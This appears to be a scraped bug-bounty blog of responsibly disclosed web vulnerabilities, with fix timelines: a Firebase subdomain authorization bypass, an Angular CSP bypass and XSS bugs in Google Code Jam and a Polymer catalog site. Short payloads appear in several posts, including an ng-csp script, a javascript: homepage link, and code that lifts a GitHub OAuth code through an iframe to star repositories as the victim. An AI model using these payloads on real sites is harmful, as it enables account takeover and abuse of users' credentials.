Author: Thomas

Bypassing Firebase authorization to create custom subdomains

Since the support of has already ended, I’ve been looking for ways to shorten URLs using Google services.

Some time ago I’ve found a bug that allowed me to shorten links using Google’s official shortener.

This time I took a look at Firebase Dynamic Links.

They work by allowing you to create short URLs on either * or * subdomains. Before subdomains in Firebase were discontinued, there was a random generated subdomain for each Firebase project, something like It could also be accessed via (=, but it doesn’t seem to work anymore.

You could also create four more * subdomains, but this time you could choose your own subdomain.

When I was setting up a new subdomain I noticed an interesting API call.


This returned an “OK” response in case the subdomain I wanted to create was both valid and not already in use.

In case it was “OK”, the “Create” button was enabled and I was able to create it. Otherwise it showed an error.

Once I clicked the button to create it, another API call was fired, this time to:


also containing desired subdomain in it’s body.

If I let the POST call thru, it would successfully add the subdomain to my project.

But let’s go back to the last API call. Since we know there are two types of domains we can use to shorten links in Firebase, let’s try to replace the value of the domainUriPrefix parameter from with

Surprisingly, this actually worked and an * subdomain was added and could be used in the project.

Since custom * subdomains like or are used only for official products by Google and can (should) by registered only by them.

This leaves us with the following attack scenario:

A regular user can create custom subdomains on via the Firebase Console. This should be possible to do only by Google.



10.08.2018: Vuln reported
13.08.2018: Priority changed to P1
14.08.2018: Accepted
22.08.2018: Fixed
Follow me on Twitter: @ThomasOrlita


More articles:
How to use Google’s CSP Evaluator to bypass CSP
Reflected XSS in Google Code Jam
Stored XSS in
Stored Angular XSS in
Angular XSS vulnerability in


< back to the list of web vulns


How to use Google’s CSP Evaluator to bypass CSP

You know that feeling when you discovered an XSS only to find out there’s an active CSP that blocks execution of any scripts?
If you want it to work on all browsers, not just IE (which doesn’t support CSP), there’s still a chance to bypass it!

Use Google’s CSP Evaluator to find ways to bypass CSP on websites using Angular libraries or JSONP endpoints.

It’s a really powerful and simple to use tool that helps you evaluate how effective these restrictions are,
useful for both website owners to improve security of their website and for bug hunters to find these flaws.

Also available as a Chrome Extension.

You can either paste the target URL or the CSP itself (which is in the content-security-policy header) into the textbox,
and it will evaluate potential problems in the CSP.

If we enter as our example URL, multiple errors appear:

We can see it found two high severity finding.

The first one is that * hosts JSONP endpoints, that would allow us to bypass the CSP.

The second one is about * allowing us to load angular.js.
That means we would be able to load and use Angular and simply bypass the CSP.
This is how it could be done:

<script src=""></script>
<div ng-app ng-csp id=p ng-click=$event.view.alert(1)>


You can check out this list of known JSONP, Flash and Angular bypasses on Google’s GitHub page, and add new bypasses to the list:

CSP Evaluator is an open source project by Google, the source code can be found on GitHub: is listing CSP flaws in many popular websites.

Read more about how CSP works in this Google Developers article: Content Security Policy
Follow me on Twitter: @ThomasOrlita


More articles:
Reflected XSS in Google Code Jam
Stored XSS in
Stored Angular XSS in
Angular XSS vulnerability in
List of web vulnerabilities I found


Reflected XSS in Google Code Jam


Information about this XSS:

The XSS will be fired in the toast message.

Also, it seems like you have to open the homepage ( at least once before visiting other pages there.


Due to CSP, this XSS will fire only in browsers where it’s not supported (i.e. IE).

If we could somehow find a way to execute a script that has inserted dynamically, we could bypass (thanks to the CSP using the following payload. But I don’t think it’s possible in this case.

<script src=""></script>
<div ng-app ng-csp id=p ng-click=$event.view.alert(1)>

Read more about bypassing CSP in my other post.

Attack scenario:

Attacker can get access to victim’s CodeJam account, for example read and edit his profile information (address, phone number, etc).

Here’s an example of how it could be done:

// go to profile page

  // change the username
  document.querySelector('#nickname').value = 'mynickname111';
  // create a fake input event 
  var event = document.createEvent("Event");
  event.initEvent('input', false, true); 
  // submit the form



29.08.2018: XSS reported
30.08.2018: Accepted
05.09.2018: Fixed

< back to the list of web vulns

View 4 Comments

Liking GitHub repositories on behalf of other users — Stored XSS in



Steps to reproduce:

1. Create a Polymer element and publish it to github
2. Set the repo homepage URL to: javascript:alert(document.domain)
3. Publish it via
4. Go to the element’s page and click the homepage link




What’s can you do with this XSS:

It’s possible, if the user has authenticated using github on before, to get the github auth code and use it to star any public github repo behalf of the user.

It would work like this:
– create an iframe with the github auth URL, and if the user is already authenticated, it redirects us to and it will have the auth code in the url as ?code=123 (and we can access the iframe cause it’s the same domain)
– use the code to post a request to‘s api to star a github repo using the user’s account

Here’s an example:

// create an iframe with github authorization url
// that redirects us back to
var iframe;
iframe = document.createElement('iframe');
iframe.src = ''; = 'none';

// just wait some time till it's loaded and redirected
setTimeout(() => {
  // get the url that contains the authorization code from the iframe
  var url = new URL(iframe.contentWindow.location.href);
  var code = url.searchParams.get("code");

  // the github repo we want to star
  var repo_to_star = 'kelseyhightower/nocode';

  // make a post request using the code
  fetch('/api/star/' + repo_to_star + '?code=' + code, {
    method: 'POST'

}, 5000);



12.08.2018: XSS reported
16.08.2018: Added more info
20.08.2018: Accepted
22.08.2018: Fixed

< back to the list of web vulns


Stored Angular XSS in

Problems: XSS (stored)
Reward: None
Fixed: Yes

< back to the list of web vulns


SQLi at Maxon

Vulnerable URL:

If you enter ‘ (a single quote) into the input field, it’ll show:

query failed1064 : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ””’ at line 1



Problems: SQLi
Reward: None
Fixed: Yes

< back to the list of web vulns


Easy way to auto-refresh POP3 accounts in Gmail every 5 minutes


► IFTTT Applet:…

► Feed URL:…

► Email address format:

► Email title: mailchecker_DELETETHIS

► Body: POP3 mailchecker_DELETETHIS from

► Gmail filter: to:(


Zhiyun Smooth Q – Video Footage Comparison


Angular XSS vulnerability on

I reported this vulnerability on

Previous fixed vulnerabilities on

< back to the list of web vulns


My blog

Coming soon… 🙂